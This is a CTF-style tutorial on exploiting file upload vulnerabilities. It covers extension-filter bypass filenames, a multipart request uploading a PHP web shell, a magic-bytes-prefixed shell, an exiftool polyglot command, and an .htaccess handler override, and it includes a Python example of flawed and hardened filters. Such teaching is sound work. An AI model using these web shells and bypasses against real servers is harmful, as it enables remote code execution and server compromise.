File Upload Challenges

Intermediate · 30 min · Writeup

Exploiting file upload vulnerabilities

Learning Objectives

  • Bypass extension filters
  • Exploit MIME type checks
  • Upload web shells
  • Chain upload with other vulns

File upload vulnerabilities are common in CTFs and can lead to remote code execution. Learn the techniques to bypass filters and upload malicious files.

File uploads are high-value targets. A successful bypass often means RCE!

Extension Bypasses

Servers often filter by extension. Try these bypasses:

```text
# Double extensions (abuse handlers that match ".php" anywhere in the name)
shell.php.jpg
shell.php.png

# Case variations (defeat case-sensitive blacklists)
shell.pHp
shell.PHP

# Null byte (older PHP, before 5.3.4; truncates the name after ".php")
shell.php%00.jpg

# Alternative PHP extensions (often mapped to the PHP handler but not blacklisted)
shell.phtml
shell.php3
shell.php4
shell.php5
shell.phar
```
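To see why these names get through, here is an added Python example (not part of the original writeup) that runs the candidate names above through two flawed filters of the kind upload handlers commonly use, and through a hardened allowlist-and-rename check. The filter functions and the candidate list are constructed for illustration.

```python
import os
import secrets

# Candidate filenames from the bypass list above, plus the plain name as a
# baseline. (Constructed for this example.)
CANDIDATES = [
    "shell.php",                               # baseline: what the filter is meant to stop
    "shell.php.jpg", "shell.php.png",          # double extensions
    "shell.pHp", "shell.PHP",                  # case variations
    "shell.php%00.jpg", "shell.php\x00.jpg",   # null byte, URL-encoded and raw
    "shell.phtml", "shell.php3", "shell.php4", "shell.php5", "shell.phar",
]

ALLOWED_IMAGE_EXTS = {".jpg", ".jpeg", ".png", ".gif"}


def blacklist_last_ext(filename: str) -> bool:
    """Flawed filter #1: case-sensitive blacklist on the final extension only."""
    return os.path.splitext(filename)[1] not in {".php"}


def blacklist_substring(filename: str) -> bool:
    """Flawed filter #2: case-insensitive substring match on '.php'.
    Catches double extensions and case games, but not every extension the
    PHP handler is mapped to."""
    return ".php" not in filename.lower()


def allowlist_and_rename(filename: str):
    """Hardened check: accept only an allowlisted final image extension, then
    throw the client-supplied name away and store under a random name.
    Returns the stored name, or None if the upload is rejected."""
    name = os.path.basename(filename.replace("\\", "/"))
    if "\x00" in name or "%00" in name.lower():
        return None
    ext = os.path.splitext(name)[1].lower()
    if ext not in ALLOWED_IMAGE_EXTS:
        return None
    # shell.php.jpg survives the allowlist, but the ".php." never reaches disk:
    # the stored name is <32 hex chars>.jpg, which no handler maps to PHP.
    return secrets.token_hex(16) + ext


def survivors(check) -> list:
    """Names that a given filter lets through."""
    return [name for name in CANDIDATES if check(name)]


def accepted_after_rename() -> dict:
    """Original name -> stored name (or None) under the hardened check."""
    return {name: allowlist_and_rename(name) for name in CANDIDATES}


if __name__ == "__main__":
    print("blacklist_last_ext lets through:", survivors(blacklist_last_ext))
    print("blacklist_substring lets through:", survivors(blacklist_substring))
    for original, stored in accepted_after_rename().items():
        print(f"{original!r:>22} -> {stored}")
```

The first filter stops only the literal `shell.php`; the second stops everything containing `.php` but still passes `.phtml` and `.phar`. The hardened check accepts only image extensions and, because it regenerates the name, a double extension that passes it is stored without the `.php.` component.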

Content-Type Bypass

Many upload handlers only look at the Content-Type header of the file part, which the client controls completely. Set it to an image type while keeping the real filename and payload:

```http
POST /upload HTTP/1.1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary

------WebKitFormBoundary
Content-Disposition: form-data; name="file"; filename="shell.php"
Content-Type: image/jpeg

<?php system($_GET['cmd']); ?>
------WebKitFormBoundary--
```

Magic Bytes

Some servers check the file signature (the first few bytes) instead of, or in addition to, the declared Content-Type. Prepend the magic bytes of an allowed image format:

```php
GIF89a
<?php system($_GET['cmd']); ?>
```

The file still executes as PHP: the interpreter copies anything before the first `<?php` tag to the output verbatim and then runs the code, so the image header does not disarm the shell.

Polyglot Files

Create a file that is a genuine image and also carries PHP, for example by writing the payload into a JPEG metadata field:

```bash
# Create a polyglot with exiftool (payload goes into the JPEG COM segment)
exiftool -Comment="<?php system(\$_GET['cmd']); ?>" image.jpg
mv image.jpg shell.php.jpg
```

Polyglots work when the server validates the file content (signature, image dimensions, even a full decode) but decides how to execute the file based on its extension.

.htaccess Tricks

If the upload directory accepts a file named `.htaccess` and Apache honours overrides there (`AllowOverride` must include `FileInfo` for this directive), you can change how already-uploaded extensions are handled. This relies on PHP running as an Apache module (mod_php); in a typical php-fpm setup, where execution is routed through a `SetHandler` proxy, the `AddType` mapping alone does not trigger execution.

```apache
# Make .jpg files in this directory execute as PHP
AddType application/x-httpd-php .jpg
```
Key Takeaways

  • Try multiple extension bypasses: double, case, alternative
  • Spoof Content-Type header in upload requests
  • Use magic bytes to bypass signature checks
  • Polyglot files can pass validation but execute as code
  • .htaccess uploads can change how files are processed